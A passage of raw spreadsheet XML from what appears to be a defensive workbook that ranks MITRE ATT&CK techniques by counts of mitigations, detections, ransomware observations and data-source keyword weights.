        <f t="array" ref="AJ11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK11" s="25">
        <f>IF(AJ11="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL11" s="25" t="str" cm="1">
        <f t="array" ref="AL11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM11" s="25">
        <f>IF(AL11="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN11" s="60">
        <v>4</v>
      </c>
      <c r="AO11" s="51">
        <v>1</v>
      </c>
      <c r="AP11" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.34803333333333336</v>
      </c>
      <c r="AQ11" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.71566666666666678</v>
      </c>
      <c r="AR11" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.71566666666666678</v>
      </c>
      <c r="AS11" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT11" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU1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2" spans="1:47" ht="96">
      <c r="A12" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24355380952380951</v>
      </c>
      <c r="B12" s="25">
        <f>SUM(H12,M12,V12)*(1+SUM(AE12,AG12,AI12,AK12,AM12))</f>
        <v>2.1022047619047619</v>
      </c>
      <c r="C12" s="25" t="s">
        <v>128</v>
      </c>
      <c r="D12" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E12" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F12" s="51">
        <v>4</v>
      </c>
      <c r="G12" s="51">
        <v>3</v>
      </c>
      <c r="H12" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I12">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J12">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K12">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L12">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M12" s="44">
        <v>1</v>
      </c>
      <c r="N12" s="51">
        <v>0</v>
      </c>
      <c r="O12" s="51">
        <v>5</v>
      </c>
      <c r="P12" s="51">
        <v>6</v>
      </c>
      <c r="Q12" s="51">
        <v>2</v>
      </c>
      <c r="R12" s="52" t="s">
        <v>130</v>
      </c>
      <c r="S12" s="51">
        <v>17</v>
      </c>
      <c r="T12" s="52" t="s">
        <v>131</v>
      </c>
      <c r="U12" s="51">
        <v>19</v>
      </c>
      <c r="V12" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.40476190476190477</v>
      </c>
      <c r="W12">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>36</v>
      </c>
      <c r="X12">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.65454545454545454</v>
      </c>
      <c r="Y12">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.65454545454545454</v>
      </c>
      <c r="Z12">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>13</v>
      </c>
      <c r="AA12">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.13</v>
      </c>
      <c r="AB12">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.13</v>
      </c>
      <c r="AC12" s="29" t="s">
        <v>132</v>
      </c>
      <c r="AD12" s="25" t="str" cm="1">
        <f t="array" ref="AD12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE12" s="25">
        <f>IF(AD12="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF12" s="25" t="str" cm="1">
        <f t="array" ref="AF12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG12" s="25">
        <f>IF(AF12="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH12" s="25" t="str" cm="1">
        <f t="array" ref="AH12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI12" s="25">
        <f>IF(AH12="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ12" s="25" t="str" cm="1">
        <f t="array" ref="AJ12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC12)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK12" s="25">
        <f>IF(AJ12="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL12" s="25" t="str" cm="1">
        <f t="array" ref="AL12">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC12)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM12" s="25">
        <f>IF(AL12="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN12" s="52">
        <v>1</v>
      </c>
      <c r="AO12" s="51">
        <v>1</v>
      </c>
      <c r="AP12" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24355380952380951</v>
      </c>
      <c r="AQ12" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.7007349206349206</v>
      </c>
      <c r="AR12" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.7007349206349206</v>
      </c>
      <c r="AS12" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT12" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU1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3" spans="1:47">
      <c r="A13" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4315342857142857</v>
      </c>
      <c r="B13" s="25">
        <f>SUM(H13,M13,V13)*(1+SUM(AE13,AG13,AI13,AK13,AM13))</f>
        <v>1.6486761904761904</v>
      </c>
      <c r="C13" s="25" t="s">
        <v>133</v>
      </c>
      <c r="D13" s="25" t="s">
        <v>134</v>
      </c>
      <c r="E13" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F13" s="51">
        <v>1</v>
      </c>
      <c r="G13" s="51">
        <v>1</v>
      </c>
      <c r="H13" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I13">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J13">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K13">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L13">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M13" s="44">
        <v>1</v>
      </c>
      <c r="N13" s="51">
        <v>5</v>
      </c>
      <c r="O13" s="51">
        <v>42</v>
      </c>
      <c r="P13" s="51">
        <v>2</v>
      </c>
      <c r="Q13" s="51">
        <v>3</v>
      </c>
      <c r="R13" s="52">
        <v>4.0999999999999996</v>
      </c>
      <c r="S13" s="51">
        <v>1</v>
      </c>
      <c r="T13" s="51" t="s">
        <v>135</v>
      </c>
      <c r="U13" s="51">
        <v>2</v>
      </c>
      <c r="V13" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27619047619047621</v>
      </c>
      <c r="W13">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>3</v>
      </c>
      <c r="X13">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Y13">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Z13">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>52</v>
      </c>
      <c r="AA13">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.52</v>
      </c>
      <c r="AB13">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.52</v>
      </c>
      <c r="AC13" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD13" s="25" t="str" cm="1">
        <f t="array" ref="AD13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC13)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE13" s="25">
        <f>IF(AD13="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF13" s="25" t="str" cm="1">
        <f t="array" ref="AF13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG13" s="25">
        <f>IF(AF13="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH13" s="25" t="str" cm="1">
        <f t="array" ref="AH13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI13" s="25">
        <f>IF(AH13="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ13" s="25" t="str" cm="1">
        <f t="array" ref="AJ13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK13" s="25">
        <f>IF(AJ13="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL13" s="25" t="str" cm="1">
        <f t="array" ref="AL13">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC13)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM13" s="25">
        <f>IF(AL13="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN13" s="60">
        <v>8</v>
      </c>
      <c r="AO13" s="51">
        <v>1</v>
      </c>
      <c r="AP13" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4315342857142857</v>
      </c>
      <c r="AQ13" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.54955873015873014</v>
      </c>
      <c r="AR13" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.54955873015873014</v>
      </c>
      <c r="AS13" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT13" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU1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4" spans="1:47" ht="48">
      <c r="A14" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24023809523809522</v>
      </c>
      <c r="B14" s="25">
        <f>SUM(H14,M14,V14)*(1+SUM(AE14,AG14,AI14,AK14,AM14))</f>
        <v>1.4023809523809523</v>
      </c>
      <c r="C14" s="25" t="s">
        <v>137</v>
      </c>
      <c r="D14" s="25" t="s">
        <v>138</v>
      </c>
      <c r="E14" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F14" s="51">
        <v>2</v>
      </c>
      <c r="G14" s="51">
        <v>1</v>
      </c>
      <c r="H14" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I14">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J14">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K14">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L14">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M14" s="44">
        <v>1</v>
      </c>
      <c r="N14" s="51">
        <v>0</v>
      </c>
      <c r="O14" s="51">
        <v>4</v>
      </c>
      <c r="P14" s="51">
        <v>0</v>
      </c>
      <c r="Q14" s="51">
        <v>1</v>
      </c>
      <c r="R14" s="52" t="s">
        <v>139</v>
      </c>
      <c r="S14" s="51">
        <v>13</v>
      </c>
      <c r="T14" s="51" t="s">
        <v>140</v>
      </c>
      <c r="U14" s="51">
        <v>11</v>
      </c>
      <c r="V14" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W14">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X14">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y14">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z14">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA14">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB14">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC14" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD14" s="25" t="str" cm="1">
        <f t="array" ref="AD14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE14" s="25">
        <f>IF(AD14="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF14" s="25" t="str" cm="1">
        <f t="array" ref="AF14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC14)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG14" s="25">
        <f>IF(AF14="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH14" s="25" t="str" cm="1">
        <f t="array" ref="AH14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI14" s="25">
        <f>IF(AH14="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ14" s="25" t="str" cm="1">
        <f t="array" ref="AJ14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK14" s="25">
        <f>IF(AJ14="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL14" s="25" t="str" cm="1">
        <f t="array" ref="AL14">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC14)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM14" s="25">
        <f>IF(AL14="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN14" s="52">
        <v>3</v>
      </c>
      <c r="AO14" s="51">
        <v>1</v>
      </c>
      <c r="AP14" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24023809523809522</v>
      </c>
      <c r="AQ14" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.46746031746031741</v>
      </c>
      <c r="AR14" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.46746031746031741</v>
      </c>
      <c r="AS14" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT14" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU1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5" spans="1:47" ht="63.95">
      <c r="A15" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.17891666666666664</v>
      </c>
      <c r="B15" s="25">
        <f>SUM(H15,M15,V15)*(1+SUM(AE15,AG15,AI15,AK15,AM15))</f>
        <v>1.7891666666666666</v>
      </c>
      <c r="C15" s="25" t="s">
        <v>142</v>
      </c>
      <c r="D15" s="25" t="s">
        <v>143</v>
      </c>
      <c r="E15" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F15" s="51">
        <v>2</v>
      </c>
      <c r="G15" s="51">
        <v>1</v>
      </c>
      <c r="H15" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I15">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J15">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K15">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L15">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M15" s="44">
        <v>1</v>
      </c>
      <c r="N15" s="51">
        <v>0</v>
      </c>
      <c r="O15" s="51">
        <v>4</v>
      </c>
      <c r="P15" s="51">
        <v>1</v>
      </c>
      <c r="Q15" s="51">
        <v>0</v>
      </c>
      <c r="R15" s="52" t="s">
        <v>144</v>
      </c>
      <c r="S15" s="51">
        <v>6</v>
      </c>
      <c r="T15" s="51" t="s">
        <v>145</v>
      </c>
      <c r="U15" s="51">
        <v>12</v>
      </c>
      <c r="V15" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19523809523809524</v>
      </c>
      <c r="W15">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X15">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y15">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z15">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA15">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB15">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC15" s="29" t="s">
        <v>146</v>
      </c>
      <c r="AD15" s="25" t="str" cm="1">
        <f t="array" ref="AD15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC15)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE15" s="25">
        <f>IF(AD15="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF15" s="25" t="str" cm="1">
        <f t="array" ref="AF15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG15" s="25">
        <f>IF(AF15="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH15" s="25" t="str" cm="1">
        <f t="array" ref="AH15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC15)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI15" s="25">
        <f>IF(AH15="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ15" s="25" t="str" cm="1">
        <f t="array" ref="AJ15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK15" s="25">
        <f>IF(AJ15="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL15" s="25" t="str" cm="1">
        <f t="array" ref="AL15">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC15)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM15" s="25">
        <f>IF(AL15="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN15" s="60">
        <v>0</v>
      </c>
      <c r="AO15" s="51">
        <v>0</v>
      </c>
      <c r="AP15" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.17891666666666664</v>
      </c>
      <c r="AQ15" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.59638888888888886</v>
      </c>
      <c r="AR15" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.59638888888888886</v>
      </c>
      <c r="AS15" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT15" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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6" spans="1:47">
      <c r="A16" s="25">
